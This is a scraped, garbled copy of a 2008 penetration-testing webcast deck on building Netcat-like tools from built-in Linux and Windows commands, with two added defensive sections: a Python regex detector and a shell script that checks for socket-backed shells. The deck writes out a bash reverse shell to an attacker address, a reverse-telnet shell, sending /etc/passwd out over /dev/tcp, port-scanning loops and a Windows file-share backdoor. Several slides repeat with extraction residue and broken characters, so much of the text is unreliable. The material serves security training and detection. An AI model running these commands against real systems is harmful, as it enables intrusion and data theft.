• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection Refused" text is not placed on Standard Output or Standard Error
  – The shell puts them in line, so we cannot redirect them to a file
[Screenshot: Port 80 is listening]
Storing Results and Iterating
• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers
Command-Line Port Scanner In Action
Linux Command-Line Backdoor via "Reverse Telnet"
• There's a whole different way we can get remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on attacker's machine via port1
• Receive output on attacker's machine on port2
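A defender reviewing audited command lines (shell history, auditd execve records, Windows process-creation events) can recognise each technique in this deck from the shape of the command alone. The following Python classifier is an added example, not from the slides or from any product: it encodes the Linux patterns from the /dev/tcp and reverse-telnet slides and the Windows patterns from the telnet-client, FTP-client and file-shell slides as sets of regular expressions that must all match, and runs them over constructed sample command lines. The addresses, file names and the two benign lines are made up; the rule names and thresholds are my own.

```python
import re

# Constructed sample command lines, not from any real host: each has the shape of a technique
# shown in the slides (addresses and file names made up), plus two benign lines to miss.
SAMPLE_COMMAND_LINES = [
    ("linux", "/bin/bash -i > /dev/tcp/10.0.0.9/4444 0<&1 2>&1"),
    ("linux", "cat /etc/passwd > /dev/tcp/10.0.0.9/9999"),
    ("linux", "port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/10.0.0.5/$port; "
              "[ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done"),
    ("linux", "telnet 10.0.0.9 8001 | /bin/bash | telnet 10.0.0.9 8002"),
    ("linux", "cat /var/log/syslog | grep sshd"),
    ("windows", "for /L %i in (1,1,1024) do echo open 10.0.0.5 %i > ftp.txt & "
                "echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt"),
    ("windows", 'for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do '
                "cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1"),
    ("windows", r"type report.txt > \\10.0.0.9\share\report.txt"),
    ("windows", 'for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1'),
    ("windows", "ftp -s:deploy.txt ftp.corp.example"),
]

# Every pattern in a rule must match for the rule to fire.
RULES = {
    "linux": {
        # shell with stdout on /dev/tcp and stdin duplicated from another descriptor
        "dev_tcp_reverse_shell": [r"/dev/tcp/", r"(^|\s)(/bin/)?(ba|z|da)?sh\b", r"\d<&\d"],
        # /dev/tcp touched inside a while/for loop: one connection per iteration
        "dev_tcp_port_probe": [r"/dev/tcp/", r"\b(while|for)\b.*\bdo\b"],
        # file contents redirected straight into /dev/tcp
        "dev_tcp_data_push": [r"\b(cat|tar|dd)\b[^|;]*>\s*/dev/tcp/"],
        # telnet client | shell | telnet client
        "reverse_telnet": [r"telnet\s+\S+\s+\d+\s*\|\s*(/bin/)?(ba)?sh\b\s*\|\s*telnet\s"],
    },
    "windows": {
        # FOR /L loop rewriting an ftp command file with "open <host> <port>" and running ftp -s:
        "ftp_client_port_sweep": [r"for\s+/L\s", r"echo\s+open\s+\S+\s+%\w", r"ftp\s+-s:"],
        # wmic used to kill telnet.exe in a loop
        "telnet_killer_loop": [r'wmic\s+process\s+where\s+name="?telnet\.exe"?\s+delete'],
        # FOR /F reads a file, cmd.exe /c runs each line, then the file is deleted
        "file_shell": [r"for\s+/f\s", r"cmd(\.exe)?\s+/c\s+%\w", r"\bdel\s+\S+"],
        # command output redirected to a UNC path rather than a local file
        "output_redirected_to_share": [r">\s*\\\\[^\\\s]+\\[^\\\s]+\\"],
        # FOR /L with a step of 0 never ends: a polling loop paced with ping -n
        "infinite_for_loop": [r"for\s+/L\s+%\w\s+in\s*\(\s*\d+\s*,\s*0\s*,\s*\d+\s*\)"],
    },
}

COMPILED = {os_name: {rule: [re.compile(p, re.IGNORECASE) for p in pats]
                      for rule, pats in rules.items()}
            for os_name, rules in RULES.items()}


def classify(os_name, command_line):
    """Return the names of all rules for os_name whose patterns all match the command line."""
    return [rule for rule, pats in COMPILED[os_name].items()
            if all(p.search(command_line) for p in pats)]


def scan(command_lines):
    """Classify each (os, command line) pair; returns (os, command line, findings) triples."""
    return [(os_name, cmd, classify(os_name, cmd)) for os_name, cmd in command_lines]


if __name__ == "__main__":
    for os_name, cmd, hits in scan(SAMPLE_COMMAND_LINES):
        print(f"[{os_name:7}] {hits or ['clean']}: {cmd[:60]}")
```

Two of the Windows rules fire together on purpose: a FOR /L loop with a step of 0 is the "spin" the file shell and the telnet-killer both rely on, so it is reported as its own finding alongside the technique-specific one.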
Reverse Telnet Shell in Action
Windows
• Built-in command-line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows
Building Blocks: Windows FOR Loops
• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items:
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work… we won't go through them again here
Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it… When it stops, hit CTRL-] and then type quit to resume
  – Or, kill the telnet client every 5 seconds:
    C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking
More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs… No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way!
Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify dest port in an FTP command file:
  – open [IPaddr] [port]
• Then, the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on open port, then moves on
  – That's not so bad
Page 8
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 839Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 8
Testing Network
Infrastructure - ISPbull For internal testing a fast connection near a backbone with
minimal filtering is idealbull For Internet-based testing you will need to send packets
through your ISP to the target
ndash Scanning ndash large number of sometimes unusual packets ndash Exploitation
bull Some ISPs detect scanning or exploits and then block them ndash Some do this with network-based Intrusion Prevention Systems
bull Can seriously impair your ability to test and the accuracy of your results
bull Tell your ISP that you plan to do pen tests and ask if theyblock
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 939Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 9
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 10
What is Netcat
bull Netcat General-purpose TCP and UDP network widget running on LinuxUnix and Windows
bull Takes Standard In and sends it across the network
bull Receives data from the network and puts it onStandard Out
bull Messages from Netcat itself put on Standard Error
NetcatStd Out Receive packets
Std In Send packets
Std Err
The
System
The
Network
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 11
What Can Netcat Do for Usbull Send files
bull Port scan
bull Backdoor shell access
bull Connecting to arbitrary open portsbull Vulnerability scanning
bull Simple chats
bull Replay data in TCP or UDP packets
bull Relays bouncing between systems
bull Much much morehellip
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 12
What Is Netcat Without
Netcatbull Netcat without Netcat involves constructing commands
that achieve Netcat behaviorhellip ndash hellipwithout the use of Netcat
bull Wersquoll rely on built-in tools only
bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone
ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp
ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client
ndash Have you ever made the Windows file system behave like acommand shell
bull YOU WILL
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13
Why Netcat without Netcatbull For penetration testers
ndash Netcat functionality is very useful in making one systemattack another machine
ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on
compromised targets ndash Some anti-virus tools detect and block Netcat
ndash Live off the land Be a command-line MacGyver
ndash Where wersquore going we donrsquot need Netcat
Attacker
ConqueredTarget
Next Target
S h e l l
a c c ess
sca na na ly z eex p lo it
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14
Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless
different waysbull Letrsquos pick some of the most useful and see how we
can make built-in tools do each function on Linux and
Windows ndash Backdoor shell
ndash File transfer
ndash Port scanner
bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques
ndash And the order of those principles differs between Linux andWindows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15
Linuxbull devtcp rocks
bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]
ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for
Netcat-like behavior
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16
Linux Command-Line File
Transfer
bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in
bull $ cat etcpasswd gt
devtcp[IPaddr][port]bull Catch it on the other side with a Netcat
listener
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17
Linux Command-Line
Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error
of a bash shell to devtcp to implement a reverse shellbackdoor
binbash ndashi gt
devtcp[Attacker_IPaddr][port] 0ltamp1
2gtamp1
bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered
binbash ndashi gt
devtcp
[Attacker_IPaddr]
[port] 0ltamp1 2gtamp1
Firewall
Blocks
incoming
Protected Servernc ndashl ndashp [p]
TYPE COMMANDS
HERE
Commands
executed
here
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18
Linux Command-Line Reverse
Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line Backdoor via "Reverse Telnet"
• There's a whole different way we can get remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine, we could run:
$ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1
• Receive output on the attacker's machine on port2
Reverse Telnet Shell in Action
Windows
• Built-in command line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows
Building Blocks: Windows FOR Loops
• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops... some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work... we won't go through them again here
Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it... When it stops, hit CTRL-[ and then type quit to resume
  – Or, kill the telnet client every 5 seconds:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking
More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs... No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way!
Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line... only connects to TCP port 21
• Solution: But you can specify the dest port in an FTP command file:
  – open [IPaddr] [port]
• Then, the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly
Making It Store Results
• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt
Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares
• C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials...
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
File Transfer in Action
Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard...
• But we can look in the file system
• A FOR loop can spin looking for a command in a file, run the command, and dump output to another file
• C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Using the File Shell
• Now, we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block...
  – Other folks are starting to use it, extending the idea
  – Use FTP client to move commands on arbitrary ports, writing them into the file system
  – Or, rely on nslookup to pull domain names that include commands
The File Shell In Action
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Conclusions
• Netcat without Netcat shows that with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code of PENTEST20
• Discount applies to 560 course through August:
  – June 4-9: Las Vegas, NV: Skoudis
  – June 12-July 22: Home On-Line: Skoudis
  – July 24-29: Wash DC: Skoudis
  – Aug 11-16: Boston: Shackleford
  – Aug 18-23: Minneapolis: Conrad
  – Aug 24-29: Va Beach: Strand
• Go to www.sans.org and look for "560" for details
Outline
• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
What is Netcat?
• Netcat: General-purpose TCP and UDP network widget running on Linux/Unix and Windows
• Takes Standard In and sends it across the network
• Receives data from the network and puts it on Standard Out
• Messages from Netcat itself put on Standard Error
[Diagram: Netcat sits between "The System" and "The Network"; Std In is sent as packets, received packets go to Std Out, and Std Err stays on the system]
What Can Netcat Do for Us?
• Send files
• Port scan
• Backdoor shell access
• Connecting to arbitrary open ports
• Vulnerability scanning
• Simple chats
• Replay data in TCP or UDP packets
• Relays bouncing between systems
• Much, much more...
What Is Netcat Without Netcat?
• Netcat without Netcat involves constructing commands that achieve Netcat behavior...
  – ...without the use of Netcat
• We'll rely on built-in tools only
• Remember those old AT&T commercials?
  – Have you ever kissed your baby goodnight... from a payphone?
  – Have you ever made a command shell backdoor using Linux's /dev/tcp?
  – Have you ever shoveled shell using Linux telnet clients?
  – Have you ever made a port scanner using a Windows FTP client?
  – Have you ever made the Windows file system behave like a command shell?
• YOU WILL!
Why Netcat without Netcat?
• For penetration testers:
  – Netcat functionality is very useful in making one system attack another machine
  – But the project's rules of engagement may prohibit installation of additional software such as Netcat on compromised targets
  – Some anti-virus tools detect and block Netcat
  – Live off the land: Be a command-line MacGyver
  – Where we're going, we don't need Netcat
[Diagram: the Attacker has shell access on a Conquered Target and uses it to scan, analyze and exploit the Next Target]
Useful Netcat Functions
• As we've seen, Netcat can be used in countless different ways
• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
  – Backdoor shell
  – File transfer
  – Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows
Linux
• /dev/tcp rocks!
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior
Linux Command-Line File Transfer
• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
$ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener
Linux Command-Line Backdoor via /dev/tcp
• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered
[Diagram: a Protected Server behind a Firewall that blocks incoming connections runs "/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1"; the attacker runs "nc -l -p [p]" and types commands there; the commands are executed on the server]
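An added example, not from the deck, showing why the order of the three redirections in this command matters and what the result looks like from the defending side. A plain file stands in for the socket, so nothing touches the network; it assumes bash for the child process and a Linux /proc filesystem for the check.

```shell
#!/bin/sh
# Added example, not from the slides. The reverse shell on this slide depends
# on the ORDER of its redirections: "> /dev/tcp/..." points fd 1 at the socket
# first, and only then do "0<&1" and "2>&1" copy that descriptor onto stdin
# and stderr. A file replaces the socket here. Assumes bash and Linux /proc.

# Same redirection order as the slide, against a file; prints the file after.
# Both lines land in the file because fd 2 was copied from fd 1 AFTER fd 1
# was pointed at the file.
plumb_to_file() {
    local out=$1
    bash -c 'echo to-stdout; echo to-stderr >&2' > "$out" 0<&1 2>&1
    cat "$out"
}

# The common mistake: "2>&1" first copies the ORIGINAL stdout (here /dev/null)
# onto fd 2, so stderr never reaches the file.
wrong_order_to_file() {
    local out=$1
    { bash -c 'echo to-stdout; echo to-stderr >&2' 2>&1 > "$out"; } >/dev/null
    cat "$out"
}

# Defender check: list processes whose fds 0, 1 and 2 all resolve to the same
# target beginning with PREFIX (default "socket:"). A shell shoveled out over
# /dev/tcp looks exactly like this, while a terminal-attached shell shows a pty.
# Output: one "<pid> <target>" line per match. Inetd-style services can match
# too, so treat the list as triage input, not a verdict.
find_shared_std_fds() {
    local prefix=${1:-socket:} pid f0 f1 f2
    for pid in /proc/[0-9]*; do
        f0=$(readlink "$pid/fd/0" 2>/dev/null) || continue
        f1=$(readlink "$pid/fd/1" 2>/dev/null) || continue
        f2=$(readlink "$pid/fd/2" 2>/dev/null) || continue
        case $f0 in "$prefix"*) ;; *) continue ;; esac
        if [ "$f0" = "$f1" ] && [ "$f1" = "$f2" ]; then
            echo "${pid#/proc/} $f0"
        fi
    done
    return 0
}
```

Run `find_shared_std_fds` with no argument on a live host to look for the socket-backed signature; the file-prefix form is only for the offline demonstration.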
Linux Command-Line Reverse Shell Backdoor In Action
Li C d Li P t
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19
Linux Command-Line Port
Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]
bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file
Port 80 is listening
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20
Storing Results and Iterating
bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed
bull For a port scanner we could use a while loop
that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==
0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done
bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for
pen testers
d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21
Command-Line Port Scanner
In Action
5 Not Closed
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
